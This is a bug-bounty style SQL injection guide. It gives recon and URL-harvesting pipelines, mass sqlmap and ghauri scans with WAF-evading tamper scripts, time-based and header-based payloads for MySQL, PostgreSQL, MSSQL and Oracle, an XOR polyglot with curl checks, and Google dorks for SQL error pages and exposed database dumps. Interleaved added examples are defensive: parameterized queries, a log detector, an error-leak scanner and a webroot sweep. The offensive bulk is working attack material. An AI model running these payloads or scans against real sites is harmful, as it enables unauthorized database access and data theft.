SQL Injection Guide
Master SQL Injection recon and exploitation with step-by-step methodology, time-based payloads, and automated testing tools.
30+ Techniques | 5+ DBMS Covered
Phase 0: Introduction
1. What is SQL Injection?
   SQL Injection is a vulnerability in which untrusted input is placed into a SQL query unchanged, letting an attacker alter the query the database actually executes.
2. Complete methodology for finding SQL injection vulnerabilities
   Master SQLi Recon: Step-by-Step Guide for Bug Bounty Hunters
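The root cause in one place, as an added example that is not part of the original guide: a lookup built by string concatenation next to the same lookup with a bound parameter, run against an in-memory SQLite database. The `users` table, its three rows and the function names are constructed for this example.

```python
"""Added example (not from the original guide): why string-built SQL is
injectable and why a bound parameter is not, shown on in-memory SQLite.

Assumptions (constructed for this example): a `users` table with three
rows and a login-style lookup by username. Nothing here is the guide's
own code.
"""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Create a throwaway in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "admin"), (2, "bob", "user"), (3, "carol", "user")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> List[Tuple]:
    """The bug: untrusted input is pasted straight into the SQL text, so a
    quote in the input ends the string literal and the rest becomes SQL."""
    query = (
        "SELECT id, username, role FROM users WHERE username = '" + username + "'"
    )
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> List[Tuple]:
    """The fix: the query text is fixed and the input is sent as a value, so
    it can only ever be compared against, never change the query's structure."""
    query = "SELECT id, username, role FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"  # classic tautology from the guide's own payload family
    print("vulnerable   :", lookup_vulnerable(db, probe))    # every row comes back
    print("parameterized:", lookup_parameterized(db, probe))  # no such user: []
```

With the concatenated version the probe turns the filter into `username = 'x' OR '1'='1'` and every row is returned; the parameterized version searches for a user literally named `x' OR '1'='1` and finds nothing. Every DBMS the sections below target has the same bound-parameter mechanism (PDO prepared statements, `SqlParameter`, JDBC `PreparedStatement`, Oracle bind variables).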
Step 1: Recon the Target Subdomains
1. For a single domain - filter subdomains by technology
   subfinder -d example.com -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'
2. For multiple subdomains listed in a file
   subfinder -dL subdomains.txt -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'
Step 2: Discovering Potential SQL Injection Endpoints
1. Using gau to find URLs with parameters (the dots are escaped so grep matches a literal extension, not any character)
   echo https://example.com | gau | uro | grep -E "\.php|\.asp|\.aspx|\.jspx|\.jsp" | grep "=" > urls.txt
2. Using Katana for deeper crawling (requires an older Katana version)
   echo https://example.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | uro | grep -E "\.php|\.asp|\.aspx|\.jspx|\.jsp" > urls2.txt
Step 3: Identify SQL-Prone URLs
1. Filter the URLs collected in Step 2 for SQL injection-prone parameters using gf
   cat urls.txt urls2.txt | gf sqli | uro > cleaned-sql.txt
Automated 1: Using ghauri
1. Automate SQLi testing with ghauri (recommended)
   ghauri -m cleaned-sql.txt --batch --dbs --level 3 --confirm
2. One-liner: subfinder + gau + gf + ghauri
   subfinder -d example.com -all -silent | gau --threads 50 | uro | gf sqli > sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm
Automated 2: Using sqlmap
1. Automate SQLi testing with sqlmap (advanced options)
   sqlmap -m cleaned-sql.txt --batch --random-agent --tamper=space2comment --level=5 --risk=3 --drop-set-cookie --threads 10 --dbs
2. One-liner: subfinder + gau + gf + sqlmap
   subfinder -d example.com -all -silent | gau | urldedupe | gf sqli > sql.txt; sqlmap -m sql.txt --batch --dbs --risk 2 --level 5 --random-agent
Time-Based 1: MySQL - Basic Delay
1. Basic time-based delay in MySQL
   SELECT SLEEP(10);
2. Inline injection with XOR logic and sleep
   0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
3. Delay using a SLEEP() subquery inside a GROUP BY on RAND()
   1 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(FLOOR(RAND()*2),(SELECT SLEEP(5))) AS x FROM information_schema.tables GROUP BY x) y);
4. Boolean logic delay with IF statement
   ' OR IF(1=1, SLEEP(10), 0)-- -
Time-Based 2: PostgreSQL - Basic Delay
1. Basic time-based delay in PostgreSQL
   SELECT pg_sleep(10);
2. Conditional delay with string concatenation
   ' OR (CASE WHEN ((LOCK_TIMESTAMP() - NOW()) < interval '0:0:10') THEN (SELECT '1' || pg_sleep(10)) ELSE '0' END)='1
3. More concise version with stacked query
   ' OR 1=1; SELECT pg_sleep(5);--
4. Using random() for variability in delay
   ' OR (SELECT CASE WHEN (random() < 0.5) THEN pg_sleep(5) ELSE pg_sleep(0) END);--
Time-Based 3: Microsoft SQL Server - Basic Delay
1. Basic delay in MSSQL
   WAITFOR DELAY '00:00:10';
2. Inline SQLi payload with WAITFOR
   '; WAITFOR DELAY '00:00:05'; --
3. Conditional delay with IF statement
   IF (1=1) WAITFOR DELAY '0:0:10';
4. Using IF EXISTS for more realism
   '; IF EXISTS (SELECT * FROM users) WAITFOR DELAY '00:00:07';--
Time-Based 4: Oracle - Basic Delay
1. Basic time delay using DBMS_PIPE in Oracle
   BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;
2. Inline SQLi payload with DBMS_PIPE
   ' OR 1=1; BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;--
3. Conditional check with delay in PL/SQL block
   DECLARE v INTEGER; BEGIN IF 1=1 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END IF; END;
Header-Based SQLi Testing
#1 Inject via User-Agent header (MySQL)
   User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
#2 Inject via X-Forwarded-For header
   X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
#3 Inject via Referer header with subquery
   Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'"
Confirm Time Delays with curl
#1 Confirm User-Agent injection with time measurement
   time curl -s -H "User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"
#2 Confirm X-Forwarded-For injection
   time curl -s -H "X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"
#3 Confirm Referer injection
   time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'"" "https://target.com/vulnerable-endpoint"
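The same time-based and header-based probes seen from the other side. This is an added example, not code from the original guide: it runs over constructed access-log lines and flags requests that carry one of the delay primitives from the MySQL, PostgreSQL, MSSQL and Oracle sections above (in the query string, Referer or User-Agent, after URL-decoding), that took unusually long to serve, or that ended in a 5xx. The log format (Nginx-style combined log with `$request_time` in seconds appended), the 5-second threshold and the signature list are this example's assumptions.

```python
"""Added example (not part of the original guide): defender-side triage of
time-based SQLi probes in web server access logs.

Assumptions: each line is a constructed Nginx-style combined log line with
$request_time (seconds) appended as the last field; the slow-response
threshold and the signature list are choices made for this example.
"""
import re
from typing import List, Optional
from urllib.parse import unquote_plus

# ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent" request_time
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<rt>[\d.]+)$'
)

# Delay primitives from the MySQL / PostgreSQL / MSSQL / Oracle sections above.
DELAY_SIGS = re.compile(
    r"sleep\s*\(|pg_sleep|waitfor\s+delay|dbms_pipe\.receive_message|benchmark\s*\(",
    re.IGNORECASE,
)

SLOW_SECONDS = 5.0  # assumed threshold: tune to the endpoint's normal latency


def normalize(value: str) -> str:
    """URL-decode twice (catches double-encoded probes) and lower-case."""
    return unquote_plus(unquote_plus(value)).lower()


def analyze_line(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if nothing stands out."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not our format; a real pipeline would count these
    reasons = []
    # Query string and the two headers the guide injects into are all checked.
    for field in ("path", "referer", "ua"):
        if DELAY_SIGS.search(normalize(m[field])):
            reasons.append(f"delay primitive in {field}")
    rt = float(m["rt"])
    if rt >= SLOW_SECONDS:
        reasons.append(f"slow response ({rt:.1f}s)")
    if m["status"].startswith("5"):
        reasons.append(f"server error {m['status']}")
    if not reasons:
        return None
    return {"ip": m["ip"], "path": m["path"], "rt": rt, "reasons": reasons}


def analyze(lines: List[str]) -> List[dict]:
    """Run analyze_line over a batch and keep only the findings."""
    return [f for f in (analyze_line(line) for line in lines) if f]


# Constructed sample lines (not real traffic). Line 2 carries the guide's
# "' OR IF(1=1, SLEEP(10), 0)-- -" payload URL-encoded in the query string;
# line 3 carries the XOR payload in the User-Agent header.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2024:10:00:01 +0000] "GET /product.php?id=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.043',
    '203.0.113.5 - - [10/Oct/2024:10:00:02 +0000] "GET /product.php?id=7%27%20OR%20IF(1%3D1%2C%20SLEEP(10)%2C%200)--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0" 10.021',
    '203.0.113.9 - - [10/Oct/2024:10:00:03 +0000] "GET /page HTTP/1.1" 200 128 "-" "0\'XOR(if(now()=sysdate(),sleep(10),0))XOR\'Z" 10.004',
    '198.51.100.2 - - [10/Oct/2024:10:00:04 +0000] "GET /report.php?q=big HTTP/1.1" 500 0 "-" "curl/8.0" 6.210',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

A signature hit on its own is a probe; a signature hit paired with a response time that matches the requested sleep (the 10-second lines above) is the same evidence the `time curl` commands give the attacker, and is the line to escalate. Header fields are checked because proxies and analytics code often write User-Agent and X-Forwarded-For straight into a database, exactly the path the header-based section relies on.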
Mastering XOR-Based SQL Injection
1. XOR polyglot - weaponized XOR logic for bypassing filters
   if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/
2. Test XOR polyglot with curl and time measurement
   time curl "https://target.com/page.php?id=if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/"
3. Download the full list of advanced XOR-based SQLi payloads for all DBMS
   https://github.com/coffinxp/loxs/tree/main/payloads/sqli
Google Dorks 1: Find URLs with Query Parameters
#1 Find URLs with id parameter
   site:*.domain.com inurl:id=
#2 Find product pages with id parameter
   site:*.domain.com inurl:product.php?id=
#3 Find view pages with page parameter
   site:*.domain.com inurl:view.php?page=
#4 Find item pages with cat parameter
   site:*.domain.com inurl:item.php?cat=
Google Dorks 2: By File Extension
#1 Find PHP files
   site:*.domain.com ext:php
#2 Find ASP files
   site:*.domain.com ext:asp
#3 Find ASPX files
   site:*.domain.com ext:aspx
#4 Find JSP files
   site:*.domain.com ext:jsp
#5 Find JSPX files
   site:*.domain.com ext:jspx
#6 Find CFM files
   site:*.domain.com ext:cfm
#7 Find PL (Perl) files
   site:*.domain.com ext:pl
Google Dorks 3: Combine Extension + Parameters
#1 PHP files with id parameter (high accuracy)
   site:*.domain.com ext:php inurl:id=
#2 ASPX files with productid parameter
   site:*.domain.com ext:aspx inurl:productid=
#3 JSP files with categoryid parameter
   site:*.domain.com ext:jsp inurl:categoryid=
Error-Based 1: MySQL Errors
#1 Classic MySQL syntax error
   site:*.domain.com intext:"You have an error in your SQL syntax"
#2 MySQL function error
   site:*.domain.com intext:"mysql_fetch_array() expects parameter"
#3 MySQL row count error
   site:*.domain.com intext:"mysql_num_rows() expects parameter"
#4 Invalid MySQL result error
   site:*.domain.com intext:"supplied argument is not a valid MySQL result resource"
#5 General MySQL warning
   site:*.domain.com intext:"Warning: mysql_"
#6 MySQLi exception error
   site:*.domain.com intext:"Fatal error: Uncaught mysqli_sql_exception"
Error-Based 2: MariaDB / PDO Errors
#1 Deprecated MySQL function error
   site:*.domain.com intext:"Fatal error: Call to undefined function mysql_connect()"
#2 PDO query warning
   site:*.domain.com intext:"Warning: PDO::query()"
#3 PDO SQLSTATE error
   site:*.domain.com intext:"SQLSTATE[HY000]"
Error-Based 3: PostgreSQL Errors
#1 PostgreSQL query failed error
   site:*.domain.com intext:"pg_query(): Query failed"
#2 PostgreSQL connection warning
   site:*.domain.com intext:"Warning: pg_connect()"
#3 PostgreSQL ERROR message
   site:*.domain.com intext:"PostgreSQL query failed: ERROR"
Error-Based 4: Microsoft SQL Server Errors
#1 OLE DB provider error
   site:*.domain.com intext:"Microsoft OLE DB Provider for SQL Server"
#2 Unclosed quotation mark (classic MSSQL error)
   site:*.domain.com intext:"Unclosed quotation mark after the character string"
#3 ADODB field error
   site:*.domain.com intext:"ADODB.Field error"
#4 MSSQL error code 80040e14
   site:*.domain.com intext:"80040e14"
Error-Based 5: Oracle DB Errors
#1 Oracle ORA-00933 error
   site:*.domain.com intext:"ORA-00933: SQL command not properly ended"
#2 Oracle ORA-01756 error
   site:*.domain.com intext:"ORA-01756: quoted string not properly terminated"
#3 Oracle oci_parse warning
   site:*.domain.com intext:"Warning: oci_parse()"
Error-Based 6: DB2 / Informix / Generic
#1 DB2 SQL error
   site:*.domain.com intext:"DB2 SQL error:"
#2 Informix syntax error
   site:*.domain.com intext:"Syntax error in string in query expression"
#3 Generic database query error
   site:*.domain.com intext:"Error Executing Database Query"
#4 Generic query failed
   site:*.domain.com intext:"Query failed:"
#5 Unexpected end of SQL
   site:*.domain.com intext:"unexpected end of SQL command"
#6 Invalid SQL statement
   site:*.domain.com intext:"invalid SQL statement"
#7 JDBC exception (Java DB connection)
   site:*.domain.com intext:"JDBC Exception"
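The error-based dorks above work only because applications return raw database error text to the browser. This added example (not code from the original guide) turns the same fingerprint strings from Error-Based 1 through 6 into a check you can run over your own application's responses, in a test suite or a release gate, so a verbose error is caught before a search engine indexes it. The response bodies in `SAMPLE_BODIES` are constructed, not captured from any real site.

```python
"""Added example (not from the original guide): detect verbose database
error text in HTTP response bodies, using the fingerprints the Error-Based
dorks above search for.

Assumption: SAMPLE_BODIES are constructed HTML fragments for this example.
"""
from typing import Dict, List, Tuple

# DBMS -> the same error strings the dork sections above look for.
DB_ERROR_SIGNATURES: Dict[str, List[str]] = {
    "MySQL": [
        "You have an error in your SQL syntax",
        "mysql_fetch_array() expects parameter",
        "mysql_num_rows() expects parameter",
        "supplied argument is not a valid MySQL result resource",
        "Warning: mysql_",
        "Fatal error: Uncaught mysqli_sql_exception",
    ],
    "MariaDB/PDO": [
        "Fatal error: Call to undefined function mysql_connect()",
        "Warning: PDO::query()",
        "SQLSTATE[HY000]",
    ],
    "PostgreSQL": [
        "pg_query(): Query failed",
        "Warning: pg_connect()",
        "PostgreSQL query failed: ERROR",
    ],
    "MSSQL": [
        "Microsoft OLE DB Provider for SQL Server",
        "Unclosed quotation mark after the character string",
        "ADODB.Field error",
        "80040e14",
    ],
    "Oracle": [
        "ORA-00933: SQL command not properly ended",
        "ORA-01756: quoted string not properly terminated",
        "Warning: oci_parse()",
    ],
    "DB2/Informix/Generic": [
        "DB2 SQL error:",
        "Syntax error in string in query expression",
        "Error Executing Database Query",
        "Query failed:",
        "unexpected end of SQL command",
        "invalid SQL statement",
        "JDBC Exception",
    ],
}


def find_db_errors(body: str) -> List[Tuple[str, str]]:
    """Return every (dbms, signature) pair present in a response body.

    Matching is case-insensitive so a template that changes capitalisation
    still trips the check; order follows the signature table above."""
    haystack = body.lower()
    hits = []
    for dbms, signatures in DB_ERROR_SIGNATURES.items():
        for sig in signatures:
            if sig.lower() in haystack:
                hits.append((dbms, sig))
    return hits


def leaks_db_error(body: str) -> bool:
    """True if the body would be found by any of the error-based dorks."""
    return bool(find_db_errors(body))


# Constructed sample responses (not from any real site).
SAMPLE_BODIES = {
    "php_mysql": (
        "<b>Warning: mysql_fetch_array() expects parameter 1 to be resource, "
        "boolean given in /var/www/html/product.php on line 12</b>"
    ),
    "classic_asp": (
        "Microsoft OLE DB Provider for SQL Server error '80040e14'<br>"
        "Unclosed quotation mark after the character string ''.<br>"
    ),
    "generic_page": "<h1>Something went wrong</h1><p>Please try again later.</p>",
}

if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(name, "->", find_db_errors(body) or "clean")
```

The fix on the application side is the generic page in the third sample: catch the database exception, log the detail server-side with a correlation id, and return only that id to the client. The check above is how you prove the fix held after the next deployment.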
Find Exposed Database Dumps or Config Files
1. Find exposed database files by extension
   site:example.com ext:sql | ext:db | ext:dbf | ext:bak | ext:old | ext:backup
2. Find database dumps in open directories
   intitle:"index of" "db.sql"
3. Variant with database.sql
   intitle:"index of" "database.sql"
4. Find SQL dump files
   intitle:"index of" "dump.sql"
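The files those dorks find usually got there by accident: a dump or a backup copy dropped into the document root. This added example (not part of the original guide) sweeps a document root for the same extensions the dorks above search for and reports any it finds, so the sweep can run before each deployment. The directory tree it scans is constructed in a temporary directory for the demo; the extension list is taken from the dork on this card.

```python
"""Added example (not from the original guide): sweep a web document root
for database dumps and backup files that should never be served.

Assumption: the sample tree built by build_sample_webroot() is constructed
for this example; EXPOSED_EXTENSIONS mirrors the dork above.
"""
import os
import shutil
import tempfile
from typing import List

# Same extensions the "ext:" dork above searches for.
EXPOSED_EXTENSIONS = (".sql", ".db", ".dbf", ".bak", ".old", ".backup")


def find_exposed_files(root: str) -> List[str]:
    """Return paths (relative to root) of files with a risky extension.

    The comparison is on the lower-cased name, so DUMP.SQL and a file like
    database.sql.old (an .old file that is also a dump) are both caught."""
    exposed = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(EXPOSED_EXTENSIONS):
                exposed.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(exposed)


def build_sample_webroot() -> str:
    """Constructed document root with a mix of harmless and risky files."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel in [
        "index.php",
        "assets/app.js",
        "backup/db.sql",
        "config.php.bak",
        "old/database.sql.old",
        "data/site.db",
    ]:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("-- constructed placeholder\n")
    return root


def demo() -> List[str]:
    """Build the sample tree, sweep it, and clean up; returns the findings."""
    root = build_sample_webroot()
    try:
        return find_exposed_files(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel in demo():
        print("exposed:", rel)
```

Point `find_exposed_files` at the real document root in a pre-deploy step and fail the build on any hit. Pair it with directory listing disabled on the web server, which removes the "index of" pages the second group of dorks depends on even for files the sweep does not know about.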
Resources to Master SQL Injection
1. Video: Master SQL Injection from beginner to pro
   https://www.youtube.com/watch?v=HD9201YJTfQ
2. Video: Advanced SQL injection techniques
   https://www.youtube.com/watch?v=x1z4GxDtEo0
3. WAF Bypass Masterclass with sqlmap + tamper scripts
   https://infosecwriteups.com/waf-bypass-masterclass-using-sqlmap-with-proxychains-and-tamper-scripts-against-cloudflare-9d46b36bae94
4. CoffinXP Python script for automated Google dorking
   https://github.com/coffinxp/scripts/blob/main/dorking.py
5. Loxs tool - Automated SQL injection detection
   https://github.com/coffinxp/loxs
Tips for Bug Bounty Hunters
#1: Test both GET and POST requests (don't limit yourself to GET; POST often has more vulnerabilities)
#2: Try tamper scripts like space2comment, between, or charencode with sqlmap (to get past WAF filters)
#3: Mix payloads into JSON bodies, XML, headers and cookies (SQLi isn't just for URL parameters)
#4: Monitor 5xx errors, long delays, and unusual behavior (even without data extraction, a reliable time delay indicates a vulnerability)
#5: Use a proxy like Burp to see responses in real time (Burp Suite helps analyze responses and craft precise payloads)